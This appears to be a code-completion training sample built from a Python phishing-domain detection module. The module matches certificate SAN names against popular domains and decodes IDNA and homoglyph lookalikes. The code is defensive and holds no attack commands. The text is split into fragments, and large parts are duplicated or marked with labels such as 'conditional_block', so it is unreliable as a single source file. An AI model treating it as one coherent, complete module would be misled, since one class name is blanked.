results[match].append(domain)
return results
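# Illustrative sketch (not part of the original module) of the two matching
# options used above, with made-up segment lists:
#
#   phish = ['login', 'apple', 'id', 'apple', 'com', 'managesuppport', 'co']
#   legit = ['apple', 'com']
#   # SUBSET_MATCH: set(legit) <= set(phish)          -> True
#   # ORDER_MATCH:  '.apple.com' in '.'.join(phish)   -> True
#   # A reordered legit list such as ['com', 'apple'] would still pass the
#   # subset check but fail the ordered one.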
class BulkDomainMarker(Analyser):
'''
Mark the record that has tons of SAN domains in it. Most of the time, they are
completely unrelated domains and probably the result of some bulk registration
process. Benign or not, they are still suspicious and probably spam. We can also
verify the similarity among these domains. A lower similarity score means these
domains are totally unrelated.
'''
def __init__(self, threshold=BULK_DOMAIN_THRESHOLD):
'''
Set the threshold to mark the record as a bulk record.
'''
self.threshold = threshold
def run(self, record):
'''
See if the record is a bulk record. We will just use the threshold as
the indicator for now. So if a record has more SAN names than the
threshold, it is a bulk record.
'''
if 'analysers' not in record:
record['analysers'] = []
is_bulked = len(record['all_domains']) >= self.threshold
record['analysers'].append({
'analyser': type(self).__name__,
'output': is_bulked,
})
return record
class IDNADecoder(Analyser):
'''
Decode all domains in IDNA format.
'''
def run(self, record):
'''
Check if a domain in the list is in IDNA format and convert it back to
Unicode.
'''
decoded = []
for domain in record['all_domains']:
wildcard = False
try:
if re.match(r'^\*\.', domain):
wildcard = True
# Remove the wildcard because it interferes with the IDNA module
# and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
domain = idna.decode(domain)
except idna.core.InvalidCodepoint:
# Failed to decode the domain; just keep it as it is for now
pass
except UnicodeError:
pass
finally:
if wildcard:
domain = '*.{}'.format(domain)
decoded.append(domain)
record['all_domains'] = decoded
return record
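# Illustrative sketch (not part of the original module): what the decoder above
# does, assuming the idna package behaves as documented:
#
#   idna.decode('xn--mnchen-3ya.de')    # -> 'münchen.de'
#   # '*.xn--mnchen-3ya.de' is not valid IDNA input, which is why the wildcard
#   # prefix is stripped first and re-attached in the finally block.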
class HomoglyphsDecoder(Analyser):
'''
Smartly convert domains whose names include some suspicious homoglyphs to
ASCII. This will probably need to be done right after IDNA conversion and
before other analysers so that they can get benefits from it.
'''
def __init__(self, greedy=False):
'''
We rely on the confusable-homoglyphs at https://github.com/vhf/confusable_homoglyphs
to do its magic.
If the greedy flag is set, all alternative domains will be returned. Otherwise, only
the first one will be available.
'''
self.greedy = greedy
def run(self, record):
'''
Using confusable-homoglyphs, we are going to generate all alternative ASCII
names of a domain. It's a bit of a brute force though.
'''
decoded = []
# For our specific case, we only care about Latin characters
lower_s = range(ord('a'), ord('z') + 1)
upper_s = range(ord('A'), ord('Z') + 1)
for domain in record['all_domains']:
wildcard = False
if re.match(r'^\*\.', domain):
wildcard = True
# Remove wildcard to simplify the domain name a bit and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
hg_map = {hg['character']: hg for hg in confusables.is_confusable(domain, greedy=True)}
decoded_domain_c = []
for domain_c in domain:
# Confusable homoglyphs could not find any homoglyphs for this character
# so we decide to keep the original character as it is
if domain_c not in hg_map:
decoded_domain_c.append([domain_c])
continue
found = []
hglyph = hg_map[domain_c]
if hglyph['alias'] == 'LATIN':
# The character is Latin, so we don't need to do anything here
found.append(hglyph['character'])
for alt in hglyph['homoglyphs']:
is_latin = True
# We need to check the length of the homoglyph here because the
# confusable_homoglyphs library nicely returns multi-character
# matches as well, for example, 'rn' has an alternative of 'm'
for alt_c in alt['c']:
if ord(alt_c) not in lower_s and ord(alt_c) not in upper_s:
is_latin = False
break
if is_latin:
found.append(alt['c'].lower())
# If nothing is found, we keep the original character
if not found:
found.append(hglyph['character'])
decoded_domain_c.append(found)
for alt in self._generate_alternatives(decoded_domain_c):
if wildcard:
alt = '*.{}'.format(alt)
decoded.append(alt)
if not self.greedy:
break
record['all_domains'] = decoded
return record
def _generate_alternatives(self, alt_characters, index=0, current=''):
'''
Generate all alternative ASCII names of a domain using the list of all
alternative characters.
'''
if index == len(alt_characters):
yield current
else:
for alt_c in alt_characters[index]:
yield from self._generate_alternatives(alt_characters,
index + 1,
current + alt_c)
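# Illustrative sketch (not part of the original module): the recursive generator
# above simply walks the cartesian product of the per-character alternatives
# ('decoder' stands for any HomoglyphsDecoder instance):
#
#   list(decoder._generate_alternatives([['a'], ['p', 'q'], ['t']]))
#   # -> ['apt', 'aqt']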
class FeaturesGenerator(Analyser):
'''
Generate features to detect outliers in the stream. In our case, the outliers are
the 'suspicious' phishing domains.
'''
NOSTRIL_LENGTH_LIMIT = 6
# pylint: disable=invalid-name
def run(self, record):
'''
The list of features will be:
- The number of domain parts, for example, www.google.com is 3.
- The overall length in characters.
- The length of the longest domain part.
- The length of the TLD, e.g. .online or .download is longer than .com.
- The randomness level of the domain.
'''
if 'analysers' not in record:
record['analysers'] = []
x_samples = []
Y_samples = []
for analyser in record['analysers']:
if analyser['analyser'] != 'WordSegmentation':
continue
for domain, segments in analyser['output'].items():
# Remove wildcard domain
domain = re.sub(r'^\*\.', '', domain)
parts = domain.split('.')
x = []
# Compute the number of domain parts
x.append(len(parts))
# Compute the length of the whole domain
x.append(len(domain))
longest = ''
# Compute the length of the longest domain parts
for part in parts:
if len(part) > len(longest):
longest = part
x.append(len(longest))
# Compute the length of the TLD
x.append(len(parts[-1]))
randomness_count = 0
# The nostril package, which we are using to detect nonsense words
# in the domain, only returns a boolean verdict, so maybe we need to
# think of how we want to quantify this
for w in segments:
try:
if len(w) >= FeaturesGenerator.NOSTRIL_LENGTH_LIMIT and nonsense(w):
randomness_count += 1
except ValueError:
continue
x.append(randomness_count / len(segments))
x_samples.append(x)
Y_samples.append(True if 'usual_suspect' in record else False)
break
record['analysers'].append({
'analyser': type(self).__name__,
'output': x_samples,
})
return record
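# Illustrative sketch (not part of the original module): for a record whose
# WordSegmentation output maps 'login-appleid.serveftp.com' to
# ['login', 'apple', 'id', 'serve', 'ftp', 'com'], the feature vector x built
# above would be approximately:
#
#   [3,     # number of dot-separated parts
#    26,    # length of the whole domain
#    13,    # length of the longest part ('login-appleid')
#    3,     # length of the TLD ('com')
#    0.0]   # fraction of segments that nostril flags as nonsense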
| record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
}) | conditional_block |
common_domain_analyser.py | '''
Verify the domain against the list of most popular domains from OpenDNS
(https://github.com/opendns/public-domain-lists). Let's see how useful
it is to prevent phishing domains.
'''
from enum import Enum
import re
import tldextract
import wordsegment
from nostril import nonsense
import idna
from confusable_homoglyphs import confusables
import ahocorasick
from .base import Analyser
# Take a histogram here and find out the suitable value for this
BULK_DOMAIN_THRESHOLD = 15
# pylint: disable=too-few-public-methods
class AhoCorasickDomainMatching(Analyser):
'''
The domain and its SAN will be compared against the list of domains, for
example, the most popular domains from OpenDNS.
'''
# Get this number from the histogram of the length of all top domains
MIN_MATCHING_LENGTH = 3
# Some domains that don't work too well with tldextract and generate too
# many FPs
EXCLUDED_DOMAINS = {
'www': 1,
'web': 1,
}
# Some common domain parts that cause too many FP
IGNORED_PARTS = r'^(autodiscover\.|cpanel\.)'
def __init__(self, domains):
'''
Use Aho-Corasick to find the matching domain so we construct its Trie
here. Thought: How the f**k is com.com in the list?
'''
self.automaton = ahocorasick.Automaton()
self.domains = {}
for index, domain in enumerate(domains):
# Processing only the domain part. All sub-domains or TLDs will
# be ignored, for example:
# - www.google.com becomes google
# - www.google.co.uk becomes google
# - del.icio.us becomes icio
ext = tldextract.extract(domain)
if ext.domain in AhoCorasickDomainMatching.EXCLUDED_DOMAINS:
continue
self.automaton.add_word(ext.domain, (index, ext.domain))
self.domains[ext.domain] = domain
self.automaton.make_automaton()
def run(self, record):
'''
Use Aho-Corasick to find the matching domain. Check the time complexity
of this function later.
Tricky situation #1: When the string (domain) in the Trie is too short,
it could match many domains, for example, g.co or t.co. So they need
to be ignored somehow. Looking at the histogram of the length of all
domains in the list, there are fewer than 100 domains with a
length of 2 or less. So we choose to ignore those. Also, we will
prefer a longer match over a shorter one for now.
'''
if 'analysers' not in record:
record['analysers'] = []
results = {}
# Check the domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# Remove some FP-prone parts
domain = re.sub(AhoCorasickDomainMatching.IGNORED_PARTS, '', domain)
# Similar to all domains in the list, the TLD will be stripped off
ext = tldextract.extract(domain)
# The match will be a tuple in the following format: (5, (0, 'google'))
matches = [m[1][1] for m in self.automaton.iter('.'.join(ext[:2]))
if len(m[1][1]) >= AhoCorasickDomainMatching.MIN_MATCHING_LENGTH]
if matches:
matches.sort(key=len)
match = matches[-1]
# We only keep the longest match of the first matching domain
# for now
results[domain] = [self.domains[match]] if match in self.domains else match
break
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
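# Illustrative sketch (not part of the original module): the tldextract calls
# used throughout this file return a (subdomain, domain, suffix) tuple, e.g.
#
#   tldextract.extract('www.google.co.uk')  # -> ('www', 'google', 'co.uk')
#   tldextract.extract('del.icio.us')       # -> ('del', 'icio', 'us')
#
# which is why only ext.domain ('google', 'icio') is added to the automaton
# and '.'.join(ext[:2]) drops the suffix before matching.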
class WordSegmentation(Analyser):
'''
Perform word segmentation of all the SAN domains as an attempt to make sense
of their names. For example, both arch.mappleonline.com and apple-verifyupdate.serveftp.com
domains have 'apple' inside but only the second one is an actual Apple phishing
page. Intuitively, a good word segmentation algorithm will return:
- arch + mapple + online + com
- apple + verify + update + serve + ftp + com
Thus, it's much easier to spot the second phishing domain.
Implementation-wise, there are several existing packages around to do this, for
example:
- https://github.com/grantjenks/python-wordsegment
- https://github.com/keredson/wordninja
Let's see what they can do, take it away!
'''
# Some common stop words that are in the list of most popular domains
STOPWORDS = {
'app': 1,
'inc': 1,
'box': 1,
'health': 1,
'home': 1,
'space': 1,
'cars': 1,
'nature': 1,
}
def __init__(self):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
def run(self, record):
'''
Apply word segmentation to all the SAN domain names. Let's see if it makes
any sense.
'''
if 'analysers' not in record:
record['analysers'] = []
results = {}
# Check the domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# The TLD will be stripped off because it does not contribute anything here
ext = tldextract.extract(domain)
words = []
# We choose to segment the TLD here as well, for example, .co.uk
# will become ['co', 'uk']. Let's see if this works out.
for part in ext[:]:
for token in part.split('.'):
segmented = [w for w in wordsegment.segment(token) if w not in WordSegmentation.STOPWORDS]
if segmented:
words.extend(segmented)
elif token:
# For some IDNA domain like xn--wgbfq3d.xn--ngbc5azd, the segmentation
# won't work and an empty array is returned. So we choose to just keep
# the original token
words.append(token)
results[domain] = words
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
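# Illustrative sketch (not part of the original module): roughly what the
# segmentation above yields for the two examples in the class docstring; the
# exact split depends on the corpus shipped with wordsegment.
#
#   wordsegment.segment('mappleonline')       # -> e.g. ['mapple', 'online']
#   wordsegment.segment('appleverifyupdate')  # -> e.g. ['apple', 'verify', 'update']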
class DomainMatchingOption(Enum):
'''
Control how strict we want to do our matching.
'''
# For example, applefake.it will match with apple.com because ['apple'] is
# a subset of ['apple', 'fake']
SUBSET_MATCH = 0
# Similar but use in instead of issubset so that the order is preserved
ORDER_MATCH = 1
class DomainMatching(Analyser):
'''
This is the first example of the new group of meta analysers which are used
to combine the result of other analysers.
'''
def __init__(self, include_tld=True, option=DomainMatchingOption.ORDER_MATCH):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
# Save the matching option here so we can refer to it later
self.include_tld = include_tld
self.option = {
DomainMatchingOption.SUBSET_MATCH: set,
DomainMatchingOption.ORDER_MATCH: list,
}[option]
def run(self, record):
'''
Note that a meta-analyser will need to run after other analysers have
finished so that their outputs are available.
'''
if 'analysers' not in record:
return record
analysers = {
AhoCorasickDomainMatching.__name__: {},
WordSegmentation.__name__: {},
BulkDomainMarker.__name__: {},
}
for analyser in record['analysers']:
name = analyser['analyser']
if name not in analysers:
continue
if name == BulkDomainMarker.__name__ and analyser['output']:
# Skip bulk records and deal with them later; with such a large
# number of SAN names, it's bound to be a match
continue
analysers[name] = analyser['output']
# Check that all outputs are there before continuing
if not analysers[AhoCorasickDomainMatching.__name__] or not analysers[WordSegmentation.__name__]:
return record
results = self._match(analysers[AhoCorasickDomainMatching.__name__],
analysers[WordSegmentation.__name__])
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
def _match(self, ahocorasick_output, segmentation_output):
'''
Used internally by the run function to combine AhoCorasick and WordSegmentation
results.
'''
results = {}
# Check all the matching domains reported by AhoCorasick analyser
for match, domains in ahocorasick_output.items():
# The result of AhoCorasick matcher is a list of matching domains, for example,
#
# {
# 'analyser': 'AhoCorasickDomainMatching',
# 'output': {
# 'login-appleid.apple.com.managesuppport.co': ['apple.com', 'support.com'],
# },
# },
#
if match not in segmentation_output:
continue
phish = self.option(segmentation_output[match])
match_ext = tldextract.extract(match)
for domain in domains:
ext = tldextract.extract(domain)
# This record is from a legitimate source, for example, agrosupport.zendesk.com
# will match with zendesk.com. In our case, we don't really care about this so
# it will be ignored and not reported as a match.
if ext[1:] == match_ext[1:]:
continue
tmp = []
# Intuitively, it will be more accurate if we choose to include the TLD here.
# For example, if both 'apple' and 'com' appear in the matching domain, it's
# very likely that something phishing is going on here. On the other hand,
# if only 'apple' occurs, we are not so sure and it's better left for more
# advanced analysers to have their say on that
for part in ext[:] if self.include_tld else ext[:2]:
for token in part.split('.'):
tmp.extend(wordsegment.segment(token))
legit = self.option(tmp)
if (isinstance(phish, set) and legit.issubset(phish)) or \
(isinstance(phish, list) and '.{}'.format('.'.join(legit)) in '.'.join(phish)):
# Found a possible phishing domain
if match not in results:
results[match] = []
results[match].append(domain)
return results
class BulkDomainMarker(Analyser):
'''
Mark the record that has tons of SAN domains in it. Most of the time, they are
completely unrelated domains and probably the result of some bulk registration
process. Benign or not, they are still suspicious and probably spam. We can also
verify the similarity among these domains. A lower similarity score means these
domains are totally unrelated.
'''
def __init__(self, threshold=BULK_DOMAIN_THRESHOLD):
'''
Set the threshold to mark the record as a bulk record.
'''
self.threshold = threshold
def run(self, record):
'''
See if the record is a bulk record. We will just use the threshold as
the indicator for now. So if a record has more SAN names than the
threshold, it is a bulk record.
'''
if 'analysers' not in record:
record['analysers'] = []
is_bulked = len(record['all_domains']) >= self.threshold
record['analysers'].append({
'analyser': type(self).__name__,
'output': is_bulked,
})
return record
class IDNADecoder(Analyser):
'''
Decode all domains in IDNA format.
'''
def run(self, record):
'''
Check if a domain in the list is in IDNA format and convert it back to
Unicode.
'''
decoded = []
for domain in record['all_domains']:
wildcard = False
try:
if re.match(r'^\*\.', domain):
wildcard = True
# Remove the wildcard because it interferes with the IDNA module
# and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
domain = idna.decode(domain)
except idna.core.InvalidCodepoint:
# Failed to decode the domain; just keep it as it is for now
pass
except UnicodeError:
pass
finally:
if wildcard:
domain = '*.{}'.format(domain)
decoded.append(domain)
record['all_domains'] = decoded
return record
class HomoglyphsDecoder(Analyser):
'''
Smartly convert domains whose names include some suspicious homoglyphs to
ASCII. This will probably need to be done right after IDNA conversion and
before other analysers so that they can get benefits from it.
'''
def __init__(self, greedy=False):
'''
We rely on the confusable-homoglyphs at https://github.com/vhf/confusable_homoglyphs
to do its magic.
If the greedy flag is set, all alternative domains will be returned. Otherwise, only
the first one will be available.
'''
self.greedy = greedy
def run(self, record):
'''
Using confusable-homoglyphs, we are going to generate all alternative ASCII
names of a domain. It's a bit of a brute force though.
'''
decoded = []
# For our specific case, we only care about Latin characters
lower_s = range(ord('a'), ord('z') + 1)
upper_s = range(ord('A'), ord('Z') + 1)
for domain in record['all_domains']:
wildcard = False
if re.match(r'^\*\.', domain):
wildcard = True
# Remove wildcard to simplify the domain name a bit and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
hg_map = {hg['character']: hg for hg in confusables.is_confusable(domain, greedy=True)}
decoded_domain_c = []
for domain_c in domain:
# Confusable homoglyphs could not find any homoglyphs for this character
# so we decide to keep the original character as it is
if domain_c not in hg_map:
decoded_domain_c.append([domain_c])
continue
found = []
hglyph = hg_map[domain_c]
if hglyph['alias'] == 'LATIN':
# The character is Latin, so we don't need to do anything here
found.append(hglyph['character'])
for alt in hglyph['homoglyphs']:
is_latin = True
# We need to check the length of the homoglyph here because the
# confusable_homoglyphs library nicely returns multi-character
# matches as well, for example, 'rn' has an alternative of 'm'
for alt_c in alt['c']:
if ord(alt_c) not in lower_s and ord(alt_c) not in upper_s:
is_latin = False
break
if is_latin:
found.append(alt['c'].lower())
# If nothing is found, we keep the original character
if not found:
found.append(hglyph['character'])
decoded_domain_c.append(found)
for alt in self._generate_alternatives(decoded_domain_c):
if wildcard:
alt = '*.{}'.format(alt)
decoded.append(alt)
if not self.greedy:
break
record['all_domains'] = decoded
return record
def _generate_alternatives(self, alt_characters, index=0, current=''):
'''
Generate all alternative ASCII names of a domain using the list of all
alternative characters.
'''
if index == len(alt_characters):
yield current
else:
for alt_c in alt_characters[index]:
yield from self._generate_alternatives(alt_characters,
index + 1,
current + alt_c)
class FeaturesGenerator(Analyser):
| '''
Generate features to detect outliers in the stream. In our case, the outliers are
the 'suspicious' phishing domains.
'''
NOSTRIL_LENGTH_LIMIT = 6
# pylint: disable=invalid-name
def run(self, record):
'''
The list of features will be:
- The number of domain parts, for example, www.google.com is 3.
- The overall length in characters.
- The length of the longest domain part.
- The length of the TLD, e.g. .online or .download is longer than .com.
- The randomness level of the domain.
'''
if 'analysers' not in record:
record['analysers'] = []
x_samples = []
Y_samples = []
for analyser in record['analysers']:
if analyser['analyser'] != 'WordSegmentation':
continue
for domain, segments in analyser['output'].items():
# Remove wildcard domain
domain = re.sub(r'^\*\.', '', domain)
parts = domain.split('.')
x = []
# Compute the number of domain parts
x.append(len(parts))
# Compute the length of the whole domain
x.append(len(domain))
longest = ''
# Compute the length of the longest domain parts
for part in parts:
if len(part) > len(longest):
longest = part
x.append(len(longest))
# Compute the length of the TLD
x.append(len(parts[-1]))
randomness_count = 0
# The nostril package, which we are using to detect nonsense words
# in the domain, only returns a boolean verdict, so maybe we need to
# think of how we want to quantify this
for w in segments:
try:
if len(w) >= FeaturesGenerator.NOSTRIL_LENGTH_LIMIT and nonsense(w):
randomness_count += 1
except ValueError:
continue
x.append(randomness_count / len(segments))
x_samples.append(x)
Y_samples.append(True if 'usual_suspect' in record else False)
break
record['analysers'].append({
'analyser': type(self).__name__,
'output': x_samples,
})
return record | identifier_body |
|
common_domain_analyser.py | '''
Verify the domain against the list of most popular domains from OpenDNS
(https://github.com/opendns/public-domain-lists). Let's see how useful
it is to prevent phishing domains.
'''
from enum import Enum
import re
import tldextract
import wordsegment
from nostril import nonsense
import idna
from confusable_homoglyphs import confusables
import ahocorasick
from .base import Analyser
# Take a histogram here and find out the suitable value for this
BULK_DOMAIN_THRESHOLD = 15
# pylint: disable=too-few-public-methods
class AhoCorasickDomainMatching(Analyser):
'''
The domain and its SAN will be compared against the list of domains, for
example, the most popular domains from OpenDNS.
'''
# Get this number from the histogram of the length of all top domains
MIN_MATCHING_LENGTH = 3
# Some domains that don't work too well with tldextract and generate too
# many FPs
EXCLUDED_DOMAINS = {
'www': 1,
'web': 1,
}
# Some common domain parts that cause too many FP
IGNORED_PARTS = r'^(autodiscover\.|cpanel\.)'
def __init__(self, domains):
'''
Use Aho-Corasick to find the matching domain so we construct its Trie
here. Thought: How the f**k is com.com in the list?
'''
self.automaton = ahocorasick.Automaton()
self.domains = {}
for index, domain in enumerate(domains):
# Processing only the domain part. All sub-domains or TLDs will
# be ignored, for example:
# - www.google.com becomes google
# - www.google.co.uk becomes google
# - del.icio.us becomes icio
ext = tldextract.extract(domain)
if ext.domain in AhoCorasickDomainMatching.EXCLUDED_DOMAINS:
continue
self.automaton.add_word(ext.domain, (index, ext.domain))
self.domains[ext.domain] = domain
self.automaton.make_automaton()
def run(self, record):
'''
Use Aho-Corasick to find the matching domain. Check the time complexity
of this function later.
Tricky situation #1: When the string (domain) in the Trie is too short,
it could match many domains, for example, g.co or t.co. So they need
to be ignored somehow. Looking at the histogram of the length of all
domains in the list, there are fewer than 100 domains with a
length of 2 or less. So we choose to ignore those. Also, we will
prefer a longer match over a shorter one for now.
'''
if 'analysers' not in record:
record['analysers'] = []
results = {}
# Check the domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# Remove some FP-prone parts
domain = re.sub(AhoCorasickDomainMatching.IGNORED_PARTS, '', domain)
# Similar to all domains in the list, the TLD will be stripped off
ext = tldextract.extract(domain)
# The match will be a tuple in the following format: (5, (0, 'google'))
matches = [m[1][1] for m in self.automaton.iter('.'.join(ext[:2]))
if len(m[1][1]) >= AhoCorasickDomainMatching.MIN_MATCHING_LENGTH]
if matches:
matches.sort(key=len)
match = matches[-1]
# We only keep the longest match of the first matching domain
# for now
results[domain] = [self.domains[match]] if match in self.domains else match
break
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
class WordSegmentation(Analyser):
'''
Perform word segmentation of all the SAN domains as an attempt to make sense
of their names. For example, both arch.mappleonline.com and apple-verifyupdate.serveftp.com
domains have 'apple' inside but only the second one is an actual Apple phishing
page. Intuitively, a good word segmentation algorithm will return:
- arch + mapple + online + com
- apple + verify + update + serve + ftp + com
Thus, it's much easier to spot the second phishing domain.
Implementation-wise, there are several existing packages around to do this, for
example:
- https://github.com/grantjenks/python-wordsegment
- https://github.com/keredson/wordninja
Let's see what they can do, take it away!
'''
# Some common stop words that are in the list of most popular domains
STOPWORDS = {
'app': 1,
'inc': 1,
'box': 1,
'health': 1,
'home': 1,
'space': 1,
'cars': 1,
'nature': 1,
}
def __init__(self):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
def run(self, record):
'''
Apply word segmentation to all the SAN domain names. Let's see if it makes
any sense.
'''
if 'analysers' not in record:
record['analysers'] = []
results = {}
# Check the domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# The TLD will be stripped off because it does not contribute anything here
ext = tldextract.extract(domain)
words = []
# We choose to segment the TLD here as well, for example, .co.uk
# will become ['co', 'uk']. Let's see if this works out.
for part in ext[:]:
for token in part.split('.'):
segmented = [w for w in wordsegment.segment(token) if w not in WordSegmentation.STOPWORDS]
if segmented:
words.extend(segmented)
elif token:
# For some IDNA domain like xn--wgbfq3d.xn--ngbc5azd, the segmentation
# won't work and an empty array is returned. So we choose to just keep
# the original token
words.append(token)
results[domain] = words
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
class | (Enum):
'''
Control how strict we want to do our matching.
'''
# For example, applefake.it will match with apple.com because ['apple'] is
# a subset of ['apple', 'fake']
SUBSET_MATCH = 0
# Similar but use in instead of issubset so that the order is preserved
ORDER_MATCH = 1
class DomainMatching(Analyser):
'''
This is the first example of the new group of meta analysers which are used
to combine the result of other analysers.
'''
def __init__(self, include_tld=True, option=DomainMatchingOption.ORDER_MATCH):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
# Save the matching option here so we can refer to it later
self.include_tld = include_tld
self.option = {
DomainMatchingOption.SUBSET_MATCH: set,
DomainMatchingOption.ORDER_MATCH: list,
}[option]
def run(self, record):
'''
Note that a meta-analyser will need to run after other analysers have
finished so that their outputs are available.
'''
if 'analysers' not in record:
return record
analysers = {
AhoCorasickDomainMatching.__name__: {},
WordSegmentation.__name__: {},
BulkDomainMarker.__name__: {},
}
for analyser in record['analysers']:
name = analyser['analyser']
if name not in analysers:
continue
if name == BulkDomainMarker.__name__ and analyser['output']:
# Skip bulk records and deal with them later; with such a large
# number of SAN names, it's bound to be a match
continue
analysers[name] = analyser['output']
# Check that all outputs are there before continuing
if not analysers[AhoCorasickDomainMatching.__name__] or not analysers[WordSegmentation.__name__]:
return record
results = self._match(analysers[AhoCorasickDomainMatching.__name__],
analysers[WordSegmentation.__name__])
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
def _match(self, ahocorasick_output, segmentation_output):
'''
Used internally by the run function to combine AhoCorasick and WordSegmentation
results.
'''
results = {}
# Check all the matching domains reported by AhoCorasick analyser
for match, domains in ahocorasick_output.items():
# The result of AhoCorasick matcher is a list of matching domains, for example,
#
# {
# 'analyser': 'AhoCorasickDomainMatching',
# 'output': {
# 'login-appleid.apple.com.managesuppport.co': ['apple.com', 'support.com'],
# },
# },
#
if match not in segmentation_output:
continue
phish = self.option(segmentation_output[match])
match_ext = tldextract.extract(match)
for domain in domains:
ext = tldextract.extract(domain)
# This record is from a legitimate source, for example, agrosupport.zendesk.com
# will match with zendesk.com. In our case, we don't really care about this so
# it will be ignored and not reported as a match.
if ext[1:] == match_ext[1:]:
continue
tmp = []
# Intuitively, it will be more accurate if we choose to include the TLD here.
# For example, if both 'apple' and 'com' appear in the matching domain, it's
# very likely that something phishing is going on here. On the other hand,
# if only 'apple' occurs, we are not so sure and it's better left for more
# advanced analysers to have their say on that
for part in ext[:] if self.include_tld else ext[:2]:
for token in part.split('.'):
tmp.extend(wordsegment.segment(token))
legit = self.option(tmp)
if (isinstance(phish, set) and legit.issubset(phish)) or \
(isinstance(phish, list) and '.{}'.format('.'.join(legit)) in '.'.join(phish)):
# Found a possible phishing domain
if match not in results:
results[match] = []
results[match].append(domain)
return results
class BulkDomainMarker(Analyser):
'''
Mark the record that has tons of SAN domains in it. Most of the time, they are
completely unrelated domains and probably the result of some bulk registration
process. Benign or not, they are still suspicious and probably spam. We can also
verify the similarity among these domains. A lower similarity score means these
domains are totally unrelated.
'''
def __init__(self, threshold=BULK_DOMAIN_THRESHOLD):
'''
Set the threshold to mark the record as a bulk record.
'''
self.threshold = threshold
def run(self, record):
'''
See if the record is a bulk record. We will just use the threshold as
the indicator for now. So if a record has more SAN names than the
threshold, it is a bulk record.
'''
if 'analysers' not in record:
record['analysers'] = []
is_bulked = len(record['all_domains']) >= self.threshold
record['analysers'].append({
'analyser': type(self).__name__,
'output': is_bulked,
})
return record
class IDNADecoder(Analyser):
'''
Decode all domains in IDNA format.
'''
def run(self, record):
'''
Check if a domain in the list is in IDNA format and convert it back to
Unicode.
'''
decoded = []
for domain in record['all_domains']:
wildcard = False
try:
if re.match(r'^\*\.', domain):
wildcard = True
# Remove the wildcard because it interferes with the IDNA module
# and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
domain = idna.decode(domain)
except idna.core.InvalidCodepoint:
# Failed to decode the domain; just keep it as it is for now
pass
except UnicodeError:
pass
finally:
if wildcard:
domain = '*.{}'.format(domain)
decoded.append(domain)
record['all_domains'] = decoded
return record
class HomoglyphsDecoder(Analyser):
'''
Smartly convert domains whose names include some suspicious homoglyphs to
ASCII. This will probably need to be done right after IDNA conversion and
before other analysers so that they can get benefits from it.
'''
def __init__(self, greedy=False):
'''
We rely on the confusable-homoglyphs at https://github.com/vhf/confusable_homoglyphs
to do its magic.
If the greedy flag is set, all alternative domains will be returned. Otherwise, only
the first one will be available.
'''
self.greedy = greedy
def run(self, record):
'''
Using confusable-homoglyphs, we are going to generate all alternative ASCII
names of a domain. It's a bit of a brute force though.
'''
decoded = []
# For our specific case, we only care about Latin characters
lower_s = range(ord('a'), ord('z') + 1)
upper_s = range(ord('A'), ord('Z') + 1)
for domain in record['all_domains']:
wildcard = False
if re.match(r'^\*\.', domain):
wildcard = True
# Remove wildcard to simplify the domain name a bit and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
hg_map = {hg['character']: hg for hg in confusables.is_confusable(domain, greedy=True)}
decoded_domain_c = []
for domain_c in domain:
# Confusable homoglyphs could not find any homoglyphs for this character
# so we decide to keep the original character as it is
if domain_c not in hg_map:
decoded_domain_c.append([domain_c])
continue
found = []
hglyph = hg_map[domain_c]
if hglyph['alias'] == 'LATIN':
# The character is Latin, so we don't need to do anything here
found.append(hglyph['character'])
for alt in hglyph['homoglyphs']:
is_latin = True
# We need to check the length of the homoglyph here because the
# confusable_homoglyphs library nicely returns multi-character
# matches as well, for example, 'rn' has an alternative of 'm'
for alt_c in alt['c']:
if ord(alt_c) not in lower_s and ord(alt_c) not in upper_s:
is_latin = False
break
if is_latin:
found.append(alt['c'].lower())
# If nothing is found, we keep the original character
if not found:
found.append(hglyph['character'])
decoded_domain_c.append(found)
for alt in self._generate_alternatives(decoded_domain_c):
if wildcard:
alt = '*.{}'.format(alt)
decoded.append(alt)
if not self.greedy:
break
record['all_domains'] = decoded
return record
def _generate_alternatives(self, alt_characters, index=0, current=''):
'''
Generate all alternative ASCII names of a domain using the list of all
alternative characters.
'''
if index == len(alt_characters):
yield current
else:
for alt_c in alt_characters[index]:
yield from self._generate_alternatives(alt_characters,
index + 1,
current + alt_c)
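# Illustrative sketch (not part of the original module): the decoder above only
# relies on three fields of confusables.is_confusable(..., greedy=True), whose
# entries look roughly like (values made up):
#
#   {'character': 'р',          # the suspicious (here Cyrillic) character
#    'alias': 'CYRILLIC',       # script alias, compared against 'LATIN'
#    'homoglyphs': [{'c': 'p', ...}, ...]}   # ASCII lookalikes, possibly multi-char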
class FeaturesGenerator(Analyser):
'''
Generate features to detect outliers in the stream. In our case, the outliers are
the 'suspicious' phishing domains.
'''
NOSTRIL_LENGTH_LIMIT = 6
# pylint: disable=invalid-name
def run(self, record):
'''
The list of features will be:
- The number of domain parts, for example, www.google.com is 3.
- The overall length in characters.
- The length of the longest domain part.
- The length of the TLD, e.g. .online or .download is longer than .com.
- The randomness level of the domain.
'''
if 'analysers' not in record:
record['analysers'] = []
x_samples = []
Y_samples = []
for analyser in record['analysers']:
if analyser['analyser'] != 'WordSegmentation':
continue
